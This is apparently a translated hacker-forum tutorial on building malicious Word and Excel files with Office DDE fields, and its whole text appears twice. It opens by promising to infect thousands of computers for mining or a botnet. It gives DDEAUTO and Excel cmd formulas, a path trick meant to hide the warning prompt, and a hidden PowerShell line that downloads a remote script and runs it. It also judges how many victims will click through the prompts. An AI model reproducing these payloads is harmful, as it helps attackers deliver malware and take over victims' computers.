Mailing this shit infects thousands of computers for personal use, be it for mining or something better (creating a botnet network for example)!
We will work through one harmless thing, which is not always detected with the help of antiviruses!
Theory
You can insert malicious code using DDE - Microsoft Dynamic Data Exchange In simple words, this is a field that allows you to execute a command and run an executable program.
The mechanism of interaction between applications in Microsoft Windows operating systems and OS \ 2. Although this mechanism is still supported in recent versions of Windows, it is mainly replaced by more powerful mechanisms — OLE, COM, and Microsoft OLE Automation.
However, DDE is still used in some places within Windows itself, in particular, in the mechanism for associating a file name extension with applications. This is a consequence of the development model in which Microsoft, in new versions of the Windows operating system, is ensuring compatibility with all its previous versions. It can be used to extract data from third-party applications.
You can use DDE in Word and Excel in a wide variety of variations. It's pretty easy to make such a file, which you then need to send to the victim.
Practice
How to add DDE field in Microsoft Word?
To do this, go to: Insert → Quick Items → Field (You can use the shortcut CTRL + F9):
Next you need to choose = (Formula):
After the Error in the formula appears, right-click and select Codes \ field value:
If everything is done correctly, then such an inscription should appear:
{=\*MERGEFORMAT}
In brackets you can insert a command to execute our program.
After that, you need to change this link to us necessary, and you can do this with the help of this command:
{DDEAUTO c: \\ windows \\ system32 \\ cmd.exe "/ k calc.exe"}
Important: it is necessary before an attack to find out which version of the operating system our target uses! This is due to the fact that Windows 10 64-bit has a different path for the command line (), so you should take this into account when forming the link!
Let's try to test and run. In my case, the command was used on Windows XP with Microsoft Office 2010. Let's take a closer look at the launch.
Step 1: Nothing special, the document asks if it is possible to update data that has links to other files. At this step, 95% of normal users will click "Yes".
Step 2: at this step, it is already clear that the program wants to launch the command line. There are already about 50% of ordinary users may be suspicious, but in the future we will try to solve this problem.
Step 3: after clicking Yes, the calculator opens and the following table appears. It is clear that instead of a calculator, you can add other commands, such as downloading, for example, consider a little below how to work with other command variations.
I thought about how the second step can be made invisible to me and I achieved this result:
This was achieved with the following command:
{DDEAUTO "c: \\ Programs \\ Microsoft \\ Office \\ MSWord \\ .. \\ .. \\ .. \\ .. \\ .. \\ .. \\ .. \\ .. \ \ .. \\ .. \\ .. \\ .. \\ windows \\ system32 \\ cmd.exe "" / c calc.exe "}
How to add DDE field in Microsoft Excel?
Similarly, we add the following command to cell A1:
= cmd | '/ c calc.exe'! A1
Important: you can use commands in Word and Excel with the / c and / k switch. In the first case (cmd / c just executes the program, and cmd / k executes the program and returns to the command line)!
Next, save and begin to test!
Step 1 :
Step 2 :
Step 3 :
As you can see, the calculator was successfully launched - it means we coped with the task!
Important: Considering the fact that cmd has a limit on the length of the argument of 1024 bytes, but with the help of Powershell you can significantly expand this range. Thus, you can register the download script and its execution inside DDE!
But the most interesting thing is to download and process commands, inside DDE! Let's look at a few specific commands for this:
= -2 + 3 + cmd | '/ c powershell.exe -w hidden $ e = (New-Object System.Net.WebClient) .DownloadString (\ "http: //address/script.ps1 \"); IEX $ e '! _ xlbgnm.A1
If you understand the logic, the DownloadString function via Powershell follows the link http: //address/script.ps1 and processes the script. It is very important that our target computer has Powershell version> = 3 installed
With this command you can run the batch file, which will be generated in powershell empire:
= cmd | ’/ c \\ server.com \ script.bat; IEX $ e’! A1
Conclusion
I think the idea is clear how to add malware to office documents. I want to say that when testing not all versions managed to get a positive result. This is due to the release of updates and closing the execution of DDE in newer versions!
It is important to note that the updates concerned only Microsoft Word, and in Excel and Outlook this function works by default!
We will work through one harmless thing, which is not always detected with the help of antiviruses!
Theory
You can insert malicious code using DDE - Microsoft Dynamic Data Exchange In simple words, this is a field that allows you to execute a command and run an executable program.
The mechanism of interaction between applications in Microsoft Windows operating systems and OS \ 2. Although this mechanism is still supported in recent versions of Windows, it is mainly replaced by more powerful mechanisms — OLE, COM, and Microsoft OLE Automation.
However, DDE is still used in some places within Windows itself, in particular, in the mechanism for associating a file name extension with applications. This is a consequence of the development model in which Microsoft, in new versions of the Windows operating system, is ensuring compatibility with all its previous versions. It can be used to extract data from third-party applications.
You can use DDE in Word and Excel in a wide variety of variations. It's pretty easy to make such a file, which you then need to send to the victim.
Practice
How to add DDE field in Microsoft Word?
To do this, go to: Insert → Quick Items → Field (You can use the shortcut CTRL + F9):
Next you need to choose = (Formula):
After the Error in the formula appears, right-click and select Codes \ field value:
If everything is done correctly, then such an inscription should appear:
{=\*MERGEFORMAT}
In brackets you can insert a command to execute our program.
After that, you need to change this link to us necessary, and you can do this with the help of this command:
{DDEAUTO c: \\ windows \\ system32 \\ cmd.exe "/ k calc.exe"}
Important: it is necessary before an attack to find out which version of the operating system our target uses! This is due to the fact that Windows 10 64-bit has a different path for the command line (), so you should take this into account when forming the link!
Let's try to test and run. In my case, the command was used on Windows XP with Microsoft Office 2010. Let's take a closer look at the launch.
Step 1: Nothing special, the document asks if it is possible to update data that has links to other files. At this step, 95% of normal users will click "Yes".
Step 2: at this step, it is already clear that the program wants to launch the command line. There are already about 50% of ordinary users may be suspicious, but in the future we will try to solve this problem.
Step 3: after clicking Yes, the calculator opens and the following table appears. It is clear that instead of a calculator, you can add other commands, such as downloading, for example, consider a little below how to work with other command variations.
I thought about how the second step can be made invisible to me and I achieved this result:
This was achieved with the following command:
{DDEAUTO "c: \\ Programs \\ Microsoft \\ Office \\ MSWord \\ .. \\ .. \\ .. \\ .. \\ .. \\ .. \\ .. \\ .. \ \ .. \\ .. \\ .. \\ .. \\ windows \\ system32 \\ cmd.exe "" / c calc.exe "}
How to add DDE field in Microsoft Excel?
Similarly, we add the following command to cell A1:
= cmd | '/ c calc.exe'! A1
Important: you can use commands in Word and Excel with the / c and / k switch. In the first case (cmd / c just executes the program, and cmd / k executes the program and returns to the command line)!
Next, save and begin to test!
Step 1 :
Step 2 :
Step 3 :
As you can see, the calculator was successfully launched - it means we coped with the task!
Important: Considering the fact that cmd has a limit on the length of the argument of 1024 bytes, but with the help of Powershell you can significantly expand this range. Thus, you can register the download script and its execution inside DDE!
But the most interesting thing is to download and process commands, inside DDE! Let's look at a few specific commands for this:
= -2 + 3 + cmd | '/ c powershell.exe -w hidden $ e = (New-Object System.Net.WebClient) .DownloadString (\ "http: //address/script.ps1 \"); IEX $ e '! _ xlbgnm.A1
If you understand the logic, the DownloadString function via Powershell follows the link http: //address/script.ps1 and processes the script. It is very important that our target computer has Powershell version> = 3 installed
With this command you can run the batch file, which will be generated in powershell empire:
= cmd | ’/ c \\ server.com \ script.bat; IEX $ e’! A1
Conclusion
I think the idea is clear how to add malware to office documents. I want to say that when testing not all versions managed to get a positive result. This is due to the release of updates and closing the execution of DDE in newer versions!
It is important to note that the updates concerned only Microsoft Word, and in Excel and Outlook this function works by default!